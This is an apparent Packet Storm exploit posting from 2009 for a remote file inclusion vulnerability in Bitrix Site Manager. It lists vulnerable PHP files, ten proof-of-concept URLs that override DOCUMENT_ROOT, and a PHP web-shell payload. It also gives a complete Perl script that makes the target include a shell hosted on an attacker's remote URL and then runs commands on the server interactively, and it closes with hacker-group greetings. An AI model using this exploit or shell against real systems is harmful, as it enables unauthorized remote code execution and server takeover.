Bitrix Site Manager Remote File Inclusion

2009-11-18T00:00:00
ID PACKETSTORM:82715
Type packetstorm
Reporter Don Tukulesto
Modified 2009-11-18T00:00:00

Description

                                        
                                            `#####  
# [+] Author : Don Tukulesto (root@indonesiancoder.com)  
# [+] Date : November 13, 2009  
# [+] Homepage : http://www.indonesiancoder.com  
# [+] Vendor : http://www.bitrixsoft.com/  
# [+] Method : Remote File Inclusion  
# [+] Location : INDONESIA  
# [~] Notes : I know this is an old bugs, but i just write this exploit under perl module.  
# [~] Refrence : http://www.securityfocus.com/bid/13965  
# [~] How To :  
# perl tux.pl <target> <weapon url> cmd  
# perl tux.pl http://127.0.0.1/path/ http://www.indonesiancoder.org/shell.txt cmd  
# Weapon example: <?php system($_GET['cmd']); ?>  
#####  
<!--more-->  
# [-] Bugs in  
  
[+] rss.php  
<pre lang="php">  
<?  
require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/iblock/rss.php");  
?>   
</pre>  
  
[+] redirect.php  
<pre lang="php">  
<?  
define("GENERATE_EVENT","Y");  
require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");  
if (CModule::IncludeModule("statistic"))  
{  
$goto = eregi_replace("#EVENT_GID#",CStatEvent::GetGID(),$goto);  
}  
else  
{  
$goto = eregi_replace("#EVENT_GID#","",$goto);  
}  
LocalRedirect($goto);  
?>   
</pre>  
  
[+] click.php  
<pre lang="php">  
<?  
define("GENERATE_EVENT","Y");  
require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");  
if (intval($id)>0 and CModule::IncludeModule("advertising")) CAdvBanner::Click($id);  
if (CModule::IncludeModule("statistic")) $goto = str_replace("#EVENT_GID#",CStatEvent::GetGID(),$goto);  
LocalRedirect($goto);  
?>  
</pre>  
  
[+] admin/index.php  
<pre lang="php">  
<?  
require_once(dirname(__FILE__)."/../modules/main/include/prolog_admin_before.php");  
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/prolog_admin_after.php");  
?>  
<?  
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/interface/index.php");  
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin.php");  
?>  
</pre>  
  
[+] tools/help.php  
<pre lang="php">  
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/help.php");?>   
</pre>  
  
[+] tools/calendar.php  
<pre lang="php">  
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/calendar.php");?>   
</pre>  
  
[+] tools/ticket_show_file.php  
<pre lang="php">  
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/support/admin/ticket_show_file.php");?>   
</pre>  
  
[+] tools/imagepg.php  
<pre lang="php">  
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/imagepg.php");?>   
</pre>  
  
[+] tools/help_view.php  
<pre lang="php">  
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/help_view.php");?>   
</pre>  
  
[+] tools/help_create.php  
<pre lang="php">  
<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/help_create.php");?>   
</pre>  
  
[-] PoC  
  
http://127.0.0.1/BX_ROOT/rss.php?_SERVER[DOCUMENT_ROOT]=  
http://127.0.0.1/BX_ROOT/click.php?_SERVER[DOCUMENT_ROOT]=  
http://127.0.0.1/BX_ROOT/redirect.php?_SERVER[DOCUMENT_ROOT]=  
http://127.0.0.1/BX_ROOT/admin/index.php?_SERVER[DOCUMENT_ROOT]=  
http://127.0.0.1/BX_ROOT/tools/help_create.php?_SERVER[DOCUMENT_ROOT]=  
http://127.0.0.1/BX_ROOT/tools/help_view.php?_SERVER[DOCUMENT_ROOT]=  
http://127.0.0.1/BX_ROOT/tools/imagepg.php?_SERVER[DOCUMENT_ROOT]=  
http://127.0.0.1/BX_ROOT/tools/ticket_show_file.php?_SERVER[DOCUMENT_ROOT]=  
http://127.0.0.1/BX_ROOT/tools/calendar.php?_SERVER[DOCUMENT_ROOT]=  
http://127.0.0.1/BX_ROOT/tools/help.php?_SERVER[DOCUMENT_ROOT]=  
  
[-] eXpL0!t c0des  
  
<pre lang="perl">  
#!/usr/bin/perl  
  
use HTTP::Request;  
use LWP::UserAgent;  
$RoNz = $ARGV[0];  
$Pathloader = $ARGV[1];  
$Contrex = $ARGV[2];  
if($RoNz!~/http:\/\// || $Pathloader!~/http:\/\// || !$Contrex){usage()}  
head();  
sub head()  
{  
print "[o]============================================================================[o]\r\n";  
print " | Bitrix Site Manager Multiple Remote File Include Vulnerability |\r\n";  
print "[o]============================================================================[o]\r\n";  
}  
while()  
{  
print "[w00t] \$";  
while(<STDIN>)  
{  
$kaMtiEz=$_;  
chomp($kaMtiEz);  
$arianom = LWP::UserAgent->new() or die;  
$tiw0L = HTTP::Request->new(GET =>$RoNz.'admin/index.php?_SERVER[DOCUMENT_ROOT]='.$Pathloader.'?&'.$Contrex.'='.$kaMtiEz)or die "\nCould Not connect\n";  
$abah_benu = $arianom->request($tiw0L);  
$tukulesto = $abah_benu->content;  
$tukulesto =~ tr/[\n]/[Í]/;  
if (!$kaMtiEz) {print "\nPlease Enter a Command\n\n"; $tukulesto ="";}  
elsif ($tukulesto =~/failed to open stream: HTTP request denied!/ || $tukulesto =~/: Cannot execute a blank command in /)  
{print "\nCann't Connect to cmd Host or Invalid Command\n";exit}  
elsif ($tukulesto =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}  
if($tukulesto =~ /(.*)/)  
{  
$finreturn = $1;  
$finreturn=~ tr/[Í]/[\n]/;  
print "\r\n$finreturn\n\r";  
last;  
}  
else {print "[w00t] \$";}}}last;  
sub usage()  
{  
head();  
print " | Usage: perl tux.pl <target> <weapon url> <cmd> |\r\n";  
print " | <Site> - Full path to execute ex: http://127.0.0.1/path/ |\r\n";  
print " | <Weapon url> - Path to Shell e.g http://www.indonesiancoder.org/shell.txt |\r\n";  
print " | <cmd> - Command variable used in php shell |\r\n";  
print "[o]============================================================================[o]\r\n";  
print " | IndonesianCoder Team | KILL-9 CREW | ServerIsDown | AntiSecurity.org |\r\n";  
print " | kaMtiEz, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Gh4mb4S |\r\n";  
print " | M364TR0N, TUCKER, Ian Petrucii, kecemplungkalen, NoGe, bh4nd55, MainHack.Net |\r\n";  
print " | Jack-, Contrex, yadoy666, Ronz, noname, s4va, gonzhack, cyb3r_tron, saint |\r\n";  
print " | Awan Bejat, Plaque, rey_cute, BennyCooL, SurabayaHackerLink Team and YOU! |\r\n";  
print "[o]============================================================================[o]\r\n";  
print " | http://www.IndonesianCoder.org | http://www.AntiSecRadio.fm |\r\n";  
print "[o]============================================================================[o]\r\n";  
exit();  
}  
</pre>`